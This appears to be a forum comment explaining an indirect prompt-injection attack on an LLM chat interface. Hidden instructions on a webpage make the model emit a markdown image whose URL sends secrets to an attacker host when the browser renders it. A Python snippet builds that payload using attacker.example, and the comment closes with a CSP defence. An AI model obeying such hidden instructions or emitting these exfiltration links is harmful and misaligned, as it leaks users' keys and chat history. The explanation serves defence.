No, this model does not take any actions; it only produces markdown output, which the browser then renders. It can only read webpages explicitly provided by the user. In this case the webpage contains hidden instructions, but those instructions can only affect the markdown output.
The problem is that by rendering fully featured markdown under a lax CSP, this output can actually have side effects: here, when the user's browser renders it, it makes a request to an attacker-controlled image host with secrets in the URL parameters.
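A minimal sketch of the mechanism: the hidden instructions induce the model to emit a markdown image whose URL embeds the secret. The domain, path, and secret below are purely illustrative.

```python
from urllib.parse import quote

# Hypothetical secret the hidden instructions told the model to leak
secret = "user's API key or chat history"

# The model emits this markdown image link; when the browser renders it,
# it fetches the URL, and the secret travels in the query string to the
# attacker's server (domain here is a made-up example).
payload = f"![loading](https://attacker.example/pixel.png?d={quote(secret)})"
print(payload)
```

The model itself makes no network request; the exfiltration happens only when a markdown renderer turns this into an `<img>` tag and the browser dutifully loads it.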
If the LLM output were shown as plaintext, or if links to external origins were not trusted, there would be no attack.
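One way to enforce the second option is a stricter CSP on the page that renders the model output: restricting image loads to the site's own origin means an injected external image link simply never fires. A sketch of such a header (the exact policy would depend on what the page legitimately needs):

```
Content-Security-Policy: img-src 'self'; default-src 'self'
```

With this in place the markdown can still contain the attacker's URL, but the browser refuses to make the request, so no data leaves the page.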